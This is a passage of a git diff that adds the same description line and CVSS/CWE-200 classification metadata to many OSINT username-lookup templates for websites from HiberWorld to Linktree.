CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,heylink self-contained: true diff --git a/osint/hiberworld.yaml b/osint/hiberworld.yaml index 68251e2ffc..5c2bab27b6 100644 --- a/osint/hiberworld.yaml +++ b/osint/hiberworld.yaml @@ -3,7 +3,12 @@ id: hiberworld info: name: hiberworld author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,hiberworld self-contained: true diff --git a/osint/hihello.yaml b/osint/hihello.yaml index 318625118d..efcecb1025 100644 --- a/osint/hihello.yaml +++ b/osint/hihello.yaml @@ -3,7 +3,12 @@ id: hihello info: name: HiHello author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,hihello self-contained: true diff --git a/osint/historianssocial-mastodon-instance.yaml b/osint/historianssocial-mastodon-instance.yaml index f0b8227c5b..0093ce7f16 100644 --- a/osint/historianssocial-mastodon-instance.yaml +++ b/osint/historianssocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: historianssocial-mastodon-instance info: name: Historians.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,historianssocial-mastodon-instance self-contained: true diff --git a/osint/homedesign3d.yaml b/osint/homedesign3d.yaml index 4cd358ed61..620c61db24 100644 --- a/osint/homedesign3d.yaml +++ b/osint/homedesign3d.yaml @@ -3,7 +3,12 @@ id: homedesign3d info: name: HomeDesign3D author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,homedesign3d self-contained: true diff --git a/osint/hometechsocial-mastodon-instance.yaml b/osint/hometechsocial-mastodon-instance.yaml index 311e0f63b1..f326babfb2 100644 --- a/osint/hometechsocial-mastodon-instance.yaml +++ b/osint/hometechsocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: hometechsocial-mastodon-instance info: name: Hometech.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,hometechsocial-mastodon-instance self-contained: true diff --git a/osint/hoobe.yaml b/osint/hoobe.yaml index 82b32f031f..f1072d21d9 100644 --- a/osint/hoobe.yaml +++ b/osint/hoobe.yaml @@ -3,7 +3,12 @@ id: hoobe info: name: hoo.be author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,hoobe self-contained: true diff --git a/osint/hostuxsocial-mastodon-instance.yaml b/osint/hostuxsocial-mastodon-instance.yaml index dd5dba623e..172e3bded4 100644 --- a/osint/hostuxsocial-mastodon-instance.yaml +++ b/osint/hostuxsocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: hostuxsocial-mastodon-instance info: name: Hostux.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,hostuxsocial-mastodon-instance self-contained: true diff --git a/osint/houzz.yaml b/osint/houzz.yaml index c0f7b693b1..1a5dbc2718 100644 --- a/osint/houzz.yaml +++ b/osint/houzz.yaml @@ -3,7 +3,12 @@ id: houzz info: name: Houzz author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,houzz self-contained: true diff --git a/osint/hubpages.yaml b/osint/hubpages.yaml index 39c672bb07..42a3080784 100644 --- a/osint/hubpages.yaml +++ b/osint/hubpages.yaml @@ -3,7 +3,12 @@ id: hubpages info: name: HubPages author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,hubpages self-contained: true diff --git a/osint/hubski.yaml b/osint/hubski.yaml index 13a7843206..647a15ff25 100644 --- a/osint/hubski.yaml +++ b/osint/hubski.yaml @@ -3,7 +3,12 @@ id: hubski info: name: Hubski author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,hubski self-contained: true diff --git a/osint/hugging-face.yaml b/osint/hugging-face.yaml index 5c6c06f436..ba46356b44 100644 --- a/osint/hugging-face.yaml +++ b/osint/hugging-face.yaml @@ -3,7 +3,12 @@ id: hugging-face info: name: hugging_face author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,hugging-face self-contained: true diff --git a/osint/iconfinder.yaml b/osint/iconfinder.yaml index c5f8f2fdfa..ceeb0c9c87 100644 --- a/osint/iconfinder.yaml +++ b/osint/iconfinder.yaml @@ -3,7 +3,12 @@ id: iconfinder info: name: Iconfinder author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,iconfinder self-contained: true diff --git a/osint/icq-chat.yaml b/osint/icq-chat.yaml index 918578de3b..bd829ee56c 100644 --- a/osint/icq-chat.yaml +++ b/osint/icq-chat.yaml @@ -3,7 +3,12 @@ id: icq-chat info: name: icq-chat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,icq-chat self-contained: true diff --git a/osint/ifttt.yaml b/osint/ifttt.yaml index f0ba00604c..89c2025db7 100644 --- a/osint/ifttt.yaml +++ b/osint/ifttt.yaml @@ -3,7 +3,12 @@ id: ifttt info: name: IFTTT author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,ifttt self-contained: true diff --git a/osint/ifunny.yaml b/osint/ifunny.yaml index 7db34c3965..902bbbc243 100644 --- a/osint/ifunny.yaml +++ b/osint/ifunny.yaml @@ -3,7 +3,12 @@ id: ifunny info: name: ifunny author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,ifunny self-contained: true diff --git a/osint/igromania.yaml b/osint/igromania.yaml index add2f9576a..ce23bd4f5c 100644 --- a/osint/igromania.yaml +++ b/osint/igromania.yaml @@ -3,7 +3,12 @@ id: igromania info: name: igromania author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,igromania self-contained: true diff --git a/osint/ilovegrowingmarijuana.yaml b/osint/ilovegrowingmarijuana.yaml index 88d5eb8e6e..df389db74e 100644 --- a/osint/ilovegrowingmarijuana.yaml +++ b/osint/ilovegrowingmarijuana.yaml @@ -3,7 +3,12 @@ id: ilovegrowingmarijuana info: name: ilovegrowingmarijuana author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,ilovegrowingmarijuana self-contained: true diff --git a/osint/imagefap.yaml b/osint/imagefap.yaml index ec09d0dfb3..ae4a024fe6 100644 --- a/osint/imagefap.yaml +++ b/osint/imagefap.yaml @@ -3,7 +3,12 @@ id: imagefap info: name: imagefap author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,imagefap self-contained: true diff --git a/osint/imageshack.yaml b/osint/imageshack.yaml index 78936af456..c592a19d01 100644 --- a/osint/imageshack.yaml +++ b/osint/imageshack.yaml @@ -3,7 +3,12 @@ id: imageshack info: name: ImageShack author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,imageshack self-contained: true diff --git a/osint/imgsrcru.yaml b/osint/imgsrcru.yaml index b939f6921e..db19f5f6db 100644 --- a/osint/imgsrcru.yaml +++ b/osint/imgsrcru.yaml @@ -3,7 +3,12 @@ id: imgsrcru info: name: iMGSRC.RU author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,imgsrcru self-contained: true diff --git a/osint/imgur.yaml b/osint/imgur.yaml index 305c8f4a78..f850eb6d18 100644 --- a/osint/imgur.yaml +++ b/osint/imgur.yaml @@ -3,7 +3,12 @@ id: imgur info: name: imgur author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,imgur self-contained: true diff --git a/osint/inaturalist.yaml b/osint/inaturalist.yaml index aae1b8d463..cf3e3d151b 100644 --- a/osint/inaturalist.yaml +++ b/osint/inaturalist.yaml @@ -3,7 +3,12 @@ id: inaturalist info: name: inaturalist author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,inaturalist self-contained: true diff --git a/osint/independent-academia.yaml b/osint/independent-academia.yaml index acd139fc9a..0ffb74efc9 100644 --- a/osint/independent-academia.yaml +++ b/osint/independent-academia.yaml @@ -3,7 +3,12 @@ id: independent-academia info: name: Independent academia author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,independent-academia self-contained: true diff --git a/osint/inkbunny.yaml b/osint/inkbunny.yaml index e11241ac9b..edee8dcccf 100644 --- a/osint/inkbunny.yaml +++ b/osint/inkbunny.yaml @@ -3,7 +3,12 @@ id: inkbunny info: name: InkBunny author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,inkbunny self-contained: true diff --git a/osint/insanejournal.yaml b/osint/insanejournal.yaml index 437c5babbf..41387c8c11 100644 --- a/osint/insanejournal.yaml +++ b/osint/insanejournal.yaml @@ -3,7 +3,12 @@ id: insanejournal info: name: InsaneJournal author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,insanejournal self-contained: true diff --git a/osint/instagram.yaml b/osint/instagram.yaml index 2d5d4d58d9..31bfc96a47 100644 --- a/osint/instagram.yaml +++ b/osint/instagram.yaml @@ -3,7 +3,12 @@ id: instagram info: name: Instagram author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,instagram self-contained: true diff --git a/osint/instructables.yaml b/osint/instructables.yaml index 276f5b2acd..6849b32391 100644 --- a/osint/instructables.yaml +++ b/osint/instructables.yaml @@ -3,7 +3,12 @@ id: instructables info: name: instructables author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,instructables self-contained: true diff --git a/osint/internet-archive-account.yaml b/osint/internet-archive-account.yaml index 08c1d30cac..8399c71ece 100644 --- a/osint/internet-archive-account.yaml +++ b/osint/internet-archive-account.yaml @@ -3,7 +3,12 @@ id: internet-archive-account info: name: Internet Archive Account author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,internet-archive-account self-contained: true diff --git a/osint/internet-archive-user-search.yaml b/osint/internet-archive-user-search.yaml index 1b9d202e4b..0ded71ae97 100644 --- a/osint/internet-archive-user-search.yaml +++ b/osint/internet-archive-user-search.yaml @@ -3,7 +3,12 @@ id: internet-archive-user-search info: name: Internet Archive User Search author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,internet-archive-user-search self-contained: true diff --git a/osint/interpals.yaml b/osint/interpals.yaml index 5ca66a83bb..420dfca148 100644 --- a/osint/interpals.yaml +++ b/osint/interpals.yaml @@ -3,7 +3,12 @@ id: interpals info: name: interpals author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,interpals self-contained: true diff --git a/osint/ismygirl.yaml b/osint/ismygirl.yaml index 2e0c81d820..c82e3f5040 100644 --- a/osint/ismygirl.yaml +++ b/osint/ismygirl.yaml @@ -3,7 +3,12 @@ id: ismygirl info: name: isMyGirl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,ismygirl self-contained: true diff --git a/osint/issuu.yaml b/osint/issuu.yaml index f1d551b96d..31ca110633 100644 --- a/osint/issuu.yaml +++ b/osint/issuu.yaml @@ -3,7 +3,12 @@ id: issuu info: name: issuu author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,issuu self-contained: true diff --git a/osint/itchio.yaml b/osint/itchio.yaml index 9a3d502c46..578cc1bb37 100644 --- a/osint/itchio.yaml +++ b/osint/itchio.yaml @@ -3,7 +3,12 @@ id: itchio info: name: itch.io author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,itchio self-contained: true diff --git a/osint/japandict.yaml b/osint/japandict.yaml index 4337ebf3b9..9686b9e311 100644 --- a/osint/japandict.yaml +++ b/osint/japandict.yaml @@ -3,7 +3,12 @@ id: japandict info: name: Japandict author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,japandict self-contained: true diff --git a/osint/jbzd.yaml b/osint/jbzd.yaml index d9083e170c..b6d3a24447 100644 --- a/osint/jbzd.yaml +++ b/osint/jbzd.yaml @@ -3,7 +3,12 @@ id: jbzd info: name: JBZD author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,jbzd self-contained: true diff --git a/osint/jejapl.yaml b/osint/jejapl.yaml index 7572bdf655..db6ef58aed 100644 --- a/osint/jejapl.yaml +++ b/osint/jejapl.yaml @@ -3,7 +3,12 @@ id: jejapl info: name: jeja.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,jejapl self-contained: true diff --git a/osint/jeuxvideo.yaml b/osint/jeuxvideo.yaml index cc684ffa6a..dffdf48ad9 100644 --- a/osint/jeuxvideo.yaml +++ b/osint/jeuxvideo.yaml @@ -3,7 +3,12 @@ id: jeuxvideo info: name: Jeuxvideo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,jeuxvideo self-contained: true diff --git a/osint/joe-monster.yaml b/osint/joe-monster.yaml index 29b958f391..66f7fd83ca 100644 --- a/osint/joe-monster.yaml +++ b/osint/joe-monster.yaml @@ -3,7 +3,12 @@ id: joe-monster info: name: Joe Monster author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,joe-monster self-contained: true diff --git a/osint/jsfiddle.yaml b/osint/jsfiddle.yaml index b8b2cf9a38..19676fa682 100644 --- a/osint/jsfiddle.yaml +++ b/osint/jsfiddle.yaml @@ -3,7 +3,12 @@ id: jsfiddle info: name: JSFiddle author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,jsfiddle self-contained: true diff --git a/osint/justforfans.yaml b/osint/justforfans.yaml index 2be0ee5076..bf7fbf5707 100644 --- a/osint/justforfans.yaml +++ b/osint/justforfans.yaml @@ -3,7 +3,12 @@ id: justforfans info: name: Justforfans author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,justforfans self-contained: true diff --git a/osint/kaggle.yaml b/osint/kaggle.yaml index b488d699a9..9fc1d9c68e 100644 --- a/osint/kaggle.yaml +++ b/osint/kaggle.yaml @@ -3,7 +3,12 @@ id: kaggle info: name: kaggle author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,kaggle self-contained: true diff --git a/osint/karabin.yaml b/osint/karabin.yaml index a31957a653..3632236300 100644 --- a/osint/karabin.yaml +++ b/osint/karabin.yaml @@ -3,7 +3,12 @@ id: karabin info: name: karab.in author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,karabin self-contained: true diff --git a/osint/keybase.yaml b/osint/keybase.yaml index fc105422db..ebfb96fa46 100644 --- a/osint/keybase.yaml +++ b/osint/keybase.yaml @@ -3,7 +3,12 @@ id: keybase info: name: Keybase author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,keybase self-contained: true diff --git a/osint/kickstarter.yaml b/osint/kickstarter.yaml index 42166c78af..036f71512c 100644 --- a/osint/kickstarter.yaml +++ b/osint/kickstarter.yaml @@ -3,7 +3,12 @@ id: kickstarter info: name: Kickstarter author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,kickstarter self-contained: true diff --git a/osint/kik.yaml b/osint/kik.yaml index 94394c290b..a33bb92e8c 100644 --- a/osint/kik.yaml +++ b/osint/kik.yaml @@ -3,7 +3,12 @@ id: kik info: name: kik author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,kik self-contained: true diff --git a/osint/kipin.yaml b/osint/kipin.yaml index d51b906b5b..9eb5c5dec8 100644 --- a/osint/kipin.yaml +++ b/osint/kipin.yaml @@ -3,7 +3,12 @@ id: kipin info: name: kipin author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,kipin self-contained: true diff --git a/osint/knowyourmeme.yaml b/osint/knowyourmeme.yaml index eaf84905b6..0a8b80049a 100644 --- a/osint/knowyourmeme.yaml +++ b/osint/knowyourmeme.yaml @@ -3,7 +3,12 @@ id: knowyourmeme info: name: KnowYourMeme author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,knowyourmeme self-contained: true diff --git a/osint/ko-fi.yaml b/osint/ko-fi.yaml index 3452fa5c7b..0ddce0f77a 100644 --- a/osint/ko-fi.yaml +++ b/osint/ko-fi.yaml @@ -3,7 +3,12 @@ id: ko-fi info: name: Ko-Fi author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,ko-fi self-contained: true diff --git a/osint/kongregate.yaml b/osint/kongregate.yaml index 7998cc8418..ef661adcf6 100644 --- a/osint/kongregate.yaml +++ b/osint/kongregate.yaml @@ -3,7 +3,12 @@ id: kongregate info: name: Kongregate author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,kongregate self-contained: true diff --git a/osint/kotburger.yaml b/osint/kotburger.yaml index 224c177895..90a4ac87bd 100644 --- a/osint/kotburger.yaml +++ b/osint/kotburger.yaml @@ -3,7 +3,12 @@ id: kotburger info: name: Kotburger author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,kotburger self-contained: true diff --git a/osint/kwejkpl.yaml b/osint/kwejkpl.yaml index 520eab04cb..b5208f0d2d 100644 --- a/osint/kwejkpl.yaml +++ b/osint/kwejkpl.yaml @@ -3,7 +3,12 @@ id: kwejkpl info: name: kwejk.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,kwejkpl self-contained: true diff --git a/osint/librarything.yaml b/osint/librarything.yaml index 0bbb431820..fad2e5efe2 100644 --- a/osint/librarything.yaml +++ b/osint/librarything.yaml @@ -3,7 +3,12 @@ id: librarything info: name: LibraryThing author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,librarything self-contained: true diff --git a/osint/libretoothgr-mastodon-instance.yaml b/osint/libretoothgr-mastodon-instance.yaml index cd7425c65d..268dfc99a8 100644 --- a/osint/libretoothgr-mastodon-instance.yaml +++ b/osint/libretoothgr-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: libretoothgr-mastodon-instance info: name: Libretooth.gr (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,libretoothgr-mastodon-instance self-contained: true diff --git a/osint/lichess.yaml b/osint/lichess.yaml index 6a380a6612..5209a4dc4e 100644 --- a/osint/lichess.yaml +++ b/osint/lichess.yaml @@ -3,7 +3,12 @@ id: lichess info: name: lichess author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,lichess self-contained: true diff --git a/osint/likeevideo.yaml b/osint/likeevideo.yaml index f3a3ae0886..922386cd8f 100644 --- a/osint/likeevideo.yaml +++ b/osint/likeevideo.yaml @@ -3,7 +3,12 @@ id: likeevideo info: name: likeevideo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,likeevideo self-contained: true diff --git a/osint/line.yaml b/osint/line.yaml index f466dae02f..8b7ed5abd2 100644 --- a/osint/line.yaml +++ b/osint/line.yaml @@ -3,7 +3,12 @@ id: line info: name: LINE author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,line self-contained: true diff --git a/osint/linktree.yaml b/osint/linktree.yaml index 736096e97a..d451500c3c 100644 --- a/osint/linktree.yaml +++ b/osint/linktree.yaml @@ -3,7 +3,12 @@ id: linktree info: name: Linktree author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,linktree self-contained: true diff --git a/osint/linuxorgru.yaml b/osint/linuxorgru.yaml index 78ebdce095..a5938ab5be 100644 --- a/osint/linuxorgru.yaml +++ b/osint/linuxorgru.yaml @@ -3,7 +3,12 @@ id: linuxorgru info: name: linux.org.ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,linuxorgru self-contained: true diff --git a/osint/litmindclub-mastodon-instance.yaml b/osint/litmindclub-mastodon-instance.yaml index bcb7307794..c4dd60121b 100644 --- a/osint/litmindclub-mastodon-instance.yaml +++ 